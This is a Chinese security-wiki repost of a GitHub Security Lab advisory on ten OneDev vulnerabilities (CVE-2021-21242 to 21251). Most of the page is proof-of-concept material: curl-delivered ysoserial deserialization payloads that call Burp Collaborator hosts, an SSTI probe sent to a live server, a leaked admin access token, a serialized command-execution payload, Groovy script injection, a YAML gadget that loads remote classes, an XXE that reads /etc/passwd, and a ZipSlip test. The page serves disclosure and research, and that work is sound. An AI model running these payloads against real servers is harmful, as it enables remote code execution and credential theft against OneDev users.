menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right OneDev 多个高危漏洞 (CVE-2021-21242~51).md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    OneDev 多个高危漏洞 (CVE-2021-21242~51).md
    5.91 KB / 2021-05-21 09:14:38
        # OneDev 多个高危漏洞 (CVE-2021-21242~51)

> CVE-2021-21242
> 
> CVE-2021-21243
> 
> CVE-2021-21244
> 
> CVE-2021-21245
> 
> CVE-2021-21246
> 
> CVE-2021-21247
> 
> CVE-2021-21248
> 
> CVE-2021-21249
> 
> CVE-2021-21250
> 
> CVE-2021-21251



**1.AttachmentUploadServet上的预授权不安全反序列化**

**PoC:**

用于ysoserial使用URLDNS小工具生成探测有效负载。该小工具将发送一个DNS请求,我们可以对其进行拦截以证明反序列化攻击已成功。


```bash
curl -X POST http://localhost:6610/attachment_upload -H "File-Name: foo" -H "Attachment-Support: `java -jar /Users/pwntester/Dev/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://536mvpzmverok48wr06msp5du40uoj.burpcollaborator.net | base64`"
```

**2.在KubernetesResource上进行预认证不安全反序列化**

**PoC:**

```bash
java -jar ~/Dev/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://pzs6r9v6ryn8go4gnk26o91xqowgk5.burpcollaborator.net > deser_payload.bin`
curl -H "Content-Type:application/octet-stream" --data-binary @deser_payload.bin http://localhost:6610/rest/k8s/allocate-job-caches
```

```bash
java -jar ~/Dev/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://pzs6r9v6ryn8go4gnk26o91xqowgk5.burpcollaborator.net > deser_payload.bin
curl -H "Content-Type:application/octet-stream" --data-binary @deser_payload.bin http://localhost:6610/rest/k8s/report-job-caches
```

**3.通过Bean验证消息篡改进行预身份验证SSTI**

**PoC:**

```bash
${'test'.toUpperCase()}` -> `%24%7b%27%74%65%73%74%27%2e%74%6f%55%70%70%65%72%43%61%73%65%28%29%7d
```


```bash
curl -X GET -H "Content-Type: application/json" http://localhost:6610/rest/projects\?%24%7b%27%74%65%73%74%27%2e%74%6f%55%70%70%65%72%43%61%73%65%28%29%7d=bar
```

```bash
Caused by: org.glassfish.jersey.server.ContainerException: java.lang.NoSuchMethodError: javax.el.ELContext.notifyBeforeEvaluation(Ljava/lang/String;)
```

```bash
curl -X GET -H "Content-Type: application/json"  https://code.onedev.io/rest/projects\?%24%7b%27%74%65%73%74%27%2e%74%6f%55%70%70%65%72%43%61%73%65%28%29%7d=bar
Unexpected query params: [TEST] (path = ProjectResource.query.<cross-parameter>, invalidValue = [null, null, null, org.glassfish.jersey.server.internal.routing.UriRoutingContext@5b27a361])
```


**4:验证前任意文件上传**

```
String fileName = URLDecoder.decode(request.getHeader("File-Name"), StandardCharsets.UTF_8.name());
...
String attachmentName = attachmentSuppport.saveAttachment(fileName, request.getInputStream());
```

**5:验证前访问令牌泄漏**

**PoC:**

```bash
curl -X GET -H "Content-Type: application/json" http://localhost:6610/rest/users
Unauthorized access to user profiles
```


```bash
curl -X GET -H "Content-Type: application/json" http://localhost:6610/rest/users/1
{
  "id" : 1,
  "name" : "admin",
  "fullName" : "admin",
  "ssoInfo" : {
    "connector" : null,
    "subject" : "4a155bff-715d-45e9-8898-4152bb97d25e"
  },
  "email" : "[email protected]",
  "accessToken" : "JqnqWs6YsP8x3poNpnj6J6GFbvh0szli6lr5BWH8",
  "userProjectQueries" : [ ],
  "userIssueQueries" : [ ],
  "userIssueQueryWatches" : { },
  "issueQueryWatches" : { },
  "userPullRequestQueries" : [ ],
  "userPullRequestQueryWatches" : { },
  "pullRequestQueryWatches" : { },
  "userBuildQueries" : [ ],
  "userBuildQuerySubscriptions" : [ ],
  "buildQuerySubscriptions" : [ ]
}
```

**6:BasePage(AJAX)上的验证后不安全反序列化**

**PoC:**

```bash
POST /projects/my-app/blob?7-1.IBehaviorListener.0- HTTP/1.1
Host: localhost:6610
Content-Length: 389
Accept: application/xml, text/xml, */*; q=0.01
X-Requested-With: XMLHttpRequest
Wicket-Ajax-BaseURL: projects/my-app/blob
Wicket-Ajax: true
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:6610
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:6610/projects/my-app/blob
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: JSESSIONID=node0cq7tdfxnza2v1nb58f7zwg7jj6.node0
Connection: close

data=rO0ABXN9AAAAAQAaamF2YS5ybWkucmVnaXN0cnkuUmVnaXN0cnl4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcgAtamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdEludm9jYXRpb25IYW5kbGVyAAAAAAAAAAICAAB4cgAcamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdNNhtJEMYTMeAwAAeHB3OAAKVW5pY2FzdFJlZgAPdG91Y2ggL3RtcC9mb29vAACFE//////C/CKmAAAAAAAAAAAAAAAAAAAAeA==
```

需身份验证。

**7:通过Groovy脚本注入执行验证后任意代码**

**PoC:**

```
foo") public String foo() {return "";}; static {Runtime.getRuntime().exec("touch /tmp/pwned1");} //
```

**8:验证后不安全Yaml反序列化**

```
version: 1
jobs:
- name: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://qgayzevwou8by0k3ochje4ebx23srh.burpcollaborator.net"]]]]
  image: asdasd
  commands:
  - asd
  retrieveSource: true
  cloneCredential: !DefaultCredential {}
  cpuRequirement: 250m
  memoryRequirement: 128m
  retryCondition: never
  maxRetries: 3
  retryDelay: 30
  timeout: 3600
```

**9:验证后外部实体扩展(XXE)**

**PoC:**

```xml
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>&file;</data>
```

**10:ZipSlip任意文件上传**

```java
import io.onedev.commons.utils.TarUtils;
import java.io.FileInputStream;
import java.io.File;

public class UnTarTest {
  public static void main(String[] args) {
    try {
      FileInputStream is = new FileInputStream(new File("./zip-slip.tar"));
      TarUtils.untar(is, new File("./dest"));
    } catch (Exception e) {
      e.printStackTrace();
    }
  }
}
```



from:https://securitylab.github.com/advisories/GHSL-2020-214_223-onedev
    links
    file_download